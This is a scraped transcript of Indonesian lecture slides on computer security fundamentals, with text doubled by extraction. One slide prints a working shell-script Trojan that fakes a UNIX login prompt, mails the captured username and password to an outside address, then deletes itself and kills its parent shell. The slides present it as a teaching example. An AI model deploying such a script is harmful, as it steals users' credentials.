pengamanan sistem komputer

27
PENGAMANAN PENGAMANAN Sistem Komputer Sistem Komputer

Upload: cassie

Post on 13-Jan-2016

102 views

Category:

Documents


1 download

DESCRIPTION

PENGAMANAN Sistem Komputer. Kontrak Kuliah. Tujuan Mata Kuliah : Membahas hal-hal yang merupakan ancaman bagi keamanan sistem komputer serta cara-cara penanggulangannya Materi Permasalahan pengamanan pada PDE, peluang ancaman. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: PENGAMANAN Sistem Komputer

PENGAMANANPENGAMANANSistem KomputerSistem Komputer

Page 2: PENGAMANAN Sistem Komputer

22

Kontrak KuliahKontrak Kuliah

Tujuan Mata Kuliah :Tujuan Mata Kuliah : Membahas hal-hal yang merupakan ancaman bagi keamanan Membahas hal-hal yang merupakan ancaman bagi keamanan

sistem komputer serta cara-cara penanggulangannyasistem komputer serta cara-cara penanggulangannya Materi Permasalahan pengamanan pada PDE, peluang ancaman.Materi Permasalahan pengamanan pada PDE, peluang ancaman. Manajemen pengamanan, proteksi informasi, kendali akses fisik, Manajemen pengamanan, proteksi informasi, kendali akses fisik,

pengamanan fisik, pengamanan lingkungan. pengamanan fisik, pengamanan lingkungan. Pengamanan komunikasi, kriptografi, pengamanan teknis, Pengamanan komunikasi, kriptografi, pengamanan teknis,

pengamanan sistem, identifikasi sistem, isolasi sistem komputer, pengamanan sistem, identifikasi sistem, isolasi sistem komputer, kendali akses sistem.kendali akses sistem.

Deteksi dan pengawasan, intergritas sistem, keandalan sistem.Deteksi dan pengawasan, intergritas sistem, keandalan sistem. Evaluasi ancamanEvaluasi ancaman

Pustaka 1. John M. Carrol : Computer Security, Security World Pustaka 1. John M. Carrol : Computer Security, Security World PublishingPublishing

Co. Inc., 1978Co. Inc., 1978

Page 3: PENGAMANAN Sistem Komputer

33

PenilaianPenilaian

Tugas individu : 15 %Tugas individu : 15 % Quis : 25 %Quis : 25 % UTS : 25%UTS : 25% UAS : 35%UAS : 35%

Page 4: PENGAMANAN Sistem Komputer

44

Kontrak KuliahKontrak Kuliah

2. 2. Pokok bahasan:Pokok bahasan:Keamanan komputerKeamanan komputerVirus komputerVirus komputerMemahami spywareMemahami spywareKeamanan e-businessKeamanan e-businessKeamanan jaringanKeamanan jaringanHacking dan crackingHacking dan crackingKriptografiKriptografi

Page 5: PENGAMANAN Sistem Komputer

55

Keamanan Komputer Keamanan Komputer Mengapa dibutuhkan ?Mengapa dibutuhkan ?

““information-based societinformation-based society”, menyebabkan nilai y”, menyebabkan nilai informasi menjadi sangat penting dan menuntut informasi menjadi sangat penting dan menuntut kemampuan untuk mengakses dan menyediakan kemampuan untuk mengakses dan menyediakan informasi secara cepat dan akurat menjadi informasi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi,sangat esensial bagi sebuah organisasi,

Infrastruktur Jaringan komputer, seperti LAN dan Infrastruktur Jaringan komputer, seperti LAN dan Internet, memungkinkan untuk menyediakan Internet, memungkinkan untuk menyediakan informasi secara cepat, sekaligus membuka informasi secara cepat, sekaligus membuka potensi adanya lubang keamanan potensi adanya lubang keamanan (security hol(security hole)e)

Page 6: PENGAMANAN Sistem Komputer

66

Kejahatan Komputer semakin Kejahatan Komputer semakin meningkat karena :meningkat karena :

Aplikasi bisnis berbasis TI dan jaringan komputer Aplikasi bisnis berbasis TI dan jaringan komputer meningkat : online banking, e-commerce, Electronic meningkat : online banking, e-commerce, Electronic data Interchange (EDI).data Interchange (EDI).

Desentralisasi server.Desentralisasi server. Transisi dari single vendor ke multi vendor.Transisi dari single vendor ke multi vendor. Meningkatnya kemampuan pemakai (user).Meningkatnya kemampuan pemakai (user). Kesulitan penegak hokum dan belum adanya Kesulitan penegak hokum dan belum adanya

ketentuan yang pasti.ketentuan yang pasti. Semakin kompleksnya system yang digunakan, Semakin kompleksnya system yang digunakan,

semakin besarnya source code program yang semakin besarnya source code program yang digunakan.digunakan.

Berhubungan dengan internet.Berhubungan dengan internet.

Page 7: PENGAMANAN Sistem Komputer

77

Kejahatan Komputer semakin Kejahatan Komputer semakin meningkat karena :meningkat karena :

Page 8: PENGAMANAN Sistem Komputer

88

Menurut David Icove [John D. Howard, Menurut David Icove [John D. Howard, “An Analysis Of Security“An Analysis Of Security Incidents On The Internet 1989 - 199Incidents On The Internet 1989 - 1995,” PhD thesis, Engineering and Public Policy, 5,” PhD thesis, Engineering and Public Policy,

Carnegie Mellon University, 1997.] berdasarkan lubang keamanan, keamanan dapatCarnegie Mellon University, 1997.] berdasarkan lubang keamanan, keamanan dapatdiklasifikasikan menjadi empat, yaitu:diklasifikasikan menjadi empat, yaitu:

1. Keamanan yang bersifat fisik 1. Keamanan yang bersifat fisik (physical securit(physical security): y): termasuk akses orang ke gedung, peralatan, dan media termasuk akses orang ke gedung, peralatan, dan media yang digunakan. Contoh :yang digunakan. Contoh :

Wiretapping atau hal-hal yang ber-hubungan dengan Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer yang digunakan juga akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini.dapat dimasukkan ke dalam kelas ini.

Denial of servicDenial of service, dilakukan misalnya dengan e, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diuta-makan adalah banyaknya jumlah saja karena yang diuta-makan adalah banyaknya jumlah pesan). pesan).

Syn Flood AttacSyn Flood Attack, dimana sistem k, dimana sistem (hos(host) yang dituju t) yang dituju dibanjiri oleh permintaan sehingga dia menjadi ter-lalu dibanjiri oleh permintaan sehingga dia menjadi ter-lalu sibuk dan bahkan dapat berakibat macetnya sistem sibuk dan bahkan dapat berakibat macetnya sistem (han(hang).g).

Page 9: PENGAMANAN Sistem Komputer

99

2. Keamanan yang berhubungan dengan 2. Keamanan yang berhubungan dengan orang (personelorang (personel), Contoh :), Contoh :

Identifikasi user (username dan password)Identifikasi user (username dan password) Profil resiko dari orang yang mempunyai Profil resiko dari orang yang mempunyai

akses (pemakai dan pengelola).akses (pemakai dan pengelola).

3. Keamanan dari data dan media serta 3. Keamanan dari data dan media serta teknik komunikasi teknik komunikasi (communication(communications).s).

4. Keamanan dalam operas4. Keamanan dalam operasi: Adanya i: Adanya prosedur yang digunakan untuk mengatur prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga dan mengelola sistem keamanan, dan juga ter-masuk prosedur setelah serangan ter-masuk prosedur setelah serangan (post (post attack recoverattack recovery).y).

Page 10: PENGAMANAN Sistem Komputer

1010

Karakteristik Penyusup :Karakteristik Penyusup :

The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki. tertarik menemukan jenis sistem dan data yang anda miliki.

The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah web page anda, atau merusak sistem anda, atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali pulih. sebaliknya membuat waktu dan uang anda kembali pulih.

The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem popularitas dan ketenaran. Dia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya. profil tinggi anda untuk mengiklankan kemampuannya.

The Competition (Si Pesaing) - tipe penyusup ini tertarik pada The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. Ia mungkin data yang anda miliki dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau yang dapat menguntungkannya secara keuangan atau sebaliknya.sebaliknya.

Page 11: PENGAMANAN Sistem Komputer

1111

Istilah bagi penyusup :Istilah bagi penyusup :

Mundane ; tahu mengenai hacking tapi tidak mengetahui Mundane ; tahu mengenai hacking tapi tidak mengetahui metode dan prosesnya.metode dan prosesnya.

lamer (script kiddies) ; mencoba script2 yang pernah di buat oleh lamer (script kiddies) ; mencoba script2 yang pernah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya.aktivis hacking, tapi tidak paham bagaimana cara membuatnya.

wannabe ; paham sedikit metode hacking, dan sudah mulai wannabe ; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION.RELIGION.

larva (newbie) ; hacker pemula, teknik hacking mulai dikuasai larva (newbie) ; hacker pemula, teknik hacking mulai dikuasai dengan baik, sering bereksperimen.dengan baik, sering bereksperimen.

hacker ; aktivitas hacking sebagai profesi.hacker ; aktivitas hacking sebagai profesi. wizard ; hacker yang membuat komunitas pembelajaran di wizard ; hacker yang membuat komunitas pembelajaran di

antara mereka.antara mereka. guru ; master of the master hacker, lebih mengarah ke penciptaan guru ; master of the master hacker, lebih mengarah ke penciptaan

tools-tools yang powerfull yang salah satunya dapat menunjang tools-tools yang powerfull yang salah satunya dapat menunjang aktivitas hacking, namun lebih jadi tools pemrograman system yang aktivitas hacking, namun lebih jadi tools pemrograman system yang umumumum

Page 12: PENGAMANAN Sistem Komputer

1212

ASPEK KEAMANAN KOMPUTER :ASPEK KEAMANAN KOMPUTER :

Menurut Garfinkel [Simson Garfinkel, Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privac“PGP: Pretty Good Privacy,” O’Reilly & y,” O’Reilly & Associ-ates, Inc., 1995. ] Associ-ates, Inc., 1995. ]

Page 13: PENGAMANAN Sistem Komputer

1313

1. Privacy / Confidentiality1. Privacy / Confidentiality

Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.Defenisi : menjaga informasi dari orang yang tidak berhak mengakses. Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail

seorang pemakai seorang pemakai (use(user) tidak boleh dibaca oleh administrator.r) tidak boleh dibaca oleh administrator. ConfidentialityConfidentiality : berhubungan dengan data yang diberikan ke : berhubungan dengan data yang diberikan ke

pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut. keperluan tertentu tersebut.

Contoh : data-data yang sifatnya pribadi (seperti nama, tempat Contoh : data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya. harus dapat diproteksi dalam penggunaan dan penyebarannya.

Bentuk Serangan : usaha penyadapan (dengan program Bentuk Serangan : usaha penyadapan (dengan program sniffesniffer). r). Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan

confidentiality adalah dengan menggunakan teknologi kriptografi.confidentiality adalah dengan menggunakan teknologi kriptografi.

Page 14: PENGAMANAN Sistem Komputer

1414

IntegrityIntegrity

Defenisi : informasi tidak boleh diubah Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi. tanpa seijin pemilik informasi.

Contoh : e-mail di Contoh : e-mail di intercepintercept di tengah t di tengah jalan, diubah isinya, kemudian jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju. diteruskan ke alamat yang dituju.

Bentuk serangan : Adanya virus, Bentuk serangan : Adanya virus, trojan trojan horshorse, atau pemakai lain yang mengubah e, atau pemakai lain yang mengubah informasi tanpa ijin, “man in the middle informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan attack” dimana seseorang menempatkan diri di tengah pembicaraan dan diri di tengah pembicaraan dan menyamar sebagai orang lain.menyamar sebagai orang lain.

Page 15: PENGAMANAN Sistem Komputer

1515

AuthenticationAuthentication

Defenisi : metoda untuk menyatakan bahwa informasi Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau betul-betul asli, atau orang yang mengakses atau memberikan informasi adalah betul-betul orang yang memberikan informasi adalah betul-betul orang yang dimaksud.dimaksud.

Dukungan : Dukungan : Adanya Tools membuktikan keaslian dokumen, dapat Adanya Tools membuktikan keaslian dokumen, dapat

dilakukan dengan teknologi watermarking(untuk dilakukan dengan teknologi watermarking(untuk menjaga menjaga “intellectual propert“intellectual property”, yaitu dengan menandai y”, yaitu dengan menandai dokumen atau hasil karya dengan “tanda tangan” dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan digital signature.pembuat ) dan digital signature.

Access control, yaitu berkaitan dengan pembatasan Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya. dan sejenisnya.

Page 16: PENGAMANAN Sistem Komputer

1616

Availability Availability

Defenisi : berhubungan dengan ketersediaan Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan. informasi ketika dibutuhkan.

Contoh hambatan : Contoh hambatan : ““denial of service attacdenial of service attack” (DoS attack), dimana server k” (DoS attack), dimana server

dikirimi permintaan (biasanya palsu) yang bertubi-tubi dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai dapat melayani permintaan lain atau bahkan sampai dowdown, n, hanhang, g, crascrash. h.

mailbommailbomb, dimana seorang pemakai dikirimi e-mail b, dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e-mail) dengan ukuran bertubi-tubi (katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan mengakses e-membuka e-mailnya atau kesulitan mengakses e-mailnya.mailnya.

Page 17: PENGAMANAN Sistem Komputer

1717

Access ControlAccess Control

Defenisi : cara pengaturan akses Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan kepada informasi. berhubungan dengan masalahmasalah

authentication dan juga privacyauthentication dan juga privacy Metode : menggunakan kombinasi Metode : menggunakan kombinasi

userid/password atau denganuserid/password atau dengan menggunakan mekanisme lain.menggunakan mekanisme lain.

Page 18: PENGAMANAN Sistem Komputer

1818

Non-repudiationNon-repudiation Defenisi : Aspek ini menjaga agar Defenisi : Aspek ini menjaga agar

seseorang tidak dapat menyangkal telah seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Dukungan melakukan sebuah transaksi. Dukungan bagi electronic commerce. bagi electronic commerce.

Page 19: PENGAMANAN Sistem Komputer

1919

SECURITY ATTACK MODELSSECURITY ATTACK MODELS Menurut W. Stallings [William Stallings, Menurut W. Stallings [William Stallings,

“Network and Internetwork Securit“Network and Internetwork Security,” y,” Prentice Hall, 1995.] serangan Prentice Hall, 1995.] serangan (attac(attack) k) terdiri dari :terdiri dari :

Page 20: PENGAMANAN Sistem Komputer

2020

InterruptioInterruption:n: Perangkat sistem menjadi rusak atau tidak Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan tersedia. Serangan ditujukan kepada ketersediaan (availabilit(availability) y) dari sistem. Contoh serangan adalah “denial of service attack”.dari sistem. Contoh serangan adalah “denial of service attack”.

InterceptioInterception:n: Pihak yang tidak berwenang berhasil mengakses Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah asset atau informasi. Contoh dari serangan ini adalah penyadapan penyadapan (wiretappin(wiretapping).g).

ModificatioModification:n: Pihak yang tidak berwenang tidak saja berhasil Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.web site dengan pesan-pesan yang merugikan pemilik web site.

FabricatioFabrication:n: Pihak yang tidak berwenang menyisipkan objek Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.jaringan komputer.

Page 21: PENGAMANAN Sistem Komputer

2121

MEMAHAMI HACKER BEKERJASecara umum melalui tahapan-tahapan sebagai berikut :

Tahap mencari tahu system komputer sasaran.Tahap penyusupanTahap penjelajahanTahap keluar dan menghilangkan jejak.

Page 22: PENGAMANAN Sistem Komputer

2222

Contoh kasus Trojan House, Contoh kasus Trojan House, memanfaatkan SHELL script UNIX memanfaatkan SHELL script UNIX

:: Nah sebenarnya apa sih yang terjadi ?Nah sebenarnya apa sih yang terjadi ? Sederhana, gadis cantik dan genit Sederhana, gadis cantik dan genit

peserta kuliah UNIX tersebut peserta kuliah UNIX tersebut menggunakan program kecil my_login menggunakan program kecil my_login dalam bentuk shell script yang dalam bentuk shell script yang menyerupai layar login dan password menyerupai layar login dan password sistem UNIX sebagai berikut:sistem UNIX sebagai berikut:

Page 23: PENGAMANAN Sistem Komputer

2323

#!/bin/sh #!/bin/sh ################################### ################################### # Nama program : my_login # Nama program : my_login # Deskripsi :Program kuda trojan sederhana # Deskripsi :Program kuda trojan sederhana # versi 1.0 Nopember 1999 # versi 1.0 Nopember 1999 #################################### #################################### COUNTER=0 COUNTER=0 Cat /etc/issue Cat /etc/issue While [ "$COUNTER" –ne 2 ] While [ "$COUNTER" –ne 2 ] do do let COUNTER=$COIUNTER+1 let COUNTER=$COIUNTER+1 echo "login: \c" echo "login: \c" read LOGIN read LOGIN stty echo stty echo echo "password: \c" echo "password: \c" read PASSWORD read PASSWORD echo "User $LOGIN : $PASSWORD" | mail [email protected] echo "User $LOGIN : $PASSWORD" | mail [email protected] stty echo stty echo echo echo echo "Login Incorrect" echo "Login Incorrect" done done rm $0 rm $0 kill –9 $PPID kill –9 $PPID

Page 24: PENGAMANAN Sistem Komputer

2424

Apabila program ini dijalankan maka Apabila program ini dijalankan maka akan ditampilkan layar login seperti akan ditampilkan layar login seperti layaknya awal penggunaan komputer layaknya awal penggunaan komputer pdaa sistem UNIX:pdaa sistem UNIX:

Page 25: PENGAMANAN Sistem Komputer

2525

Login: Login: Password: Password:

Page 26: PENGAMANAN Sistem Komputer

2626

Lihatlah, Administrator UNIX yang gagah perkasa tadi Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya. dibanding layar login sesungguhnya.

Seperti pada program login sesungguhnya, sistem Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka sistem. Setelah diisi password dan di enter,maka segera timbul pesan segera timbul pesan

Login:Login:rootroot Password: ******** Password: ******** Login Incorrect Login Incorrect

Page 27: PENGAMANAN Sistem Komputer

2727

REFERENSIREFERENSI Referensi Wajib:Referensi Wajib:

Raghu Ramakhrisnan, Johannes Raghu Ramakhrisnan, Johannes Gehrke , “Database Management Gehrke , “Database Management System” 6th Edition, Mc Graw System” 6th Edition, Mc Graw Hill,2006Hill,2006

(Chapter : 1)(Chapter : 1) Referensi Tambahan/dianjurkan:Referensi Tambahan/dianjurkan:

David M.Kroenke, Database Concepts David M.Kroenke, Database Concepts 4th Edition, Prentice Hall 20044th Edition, Prentice Hall 2004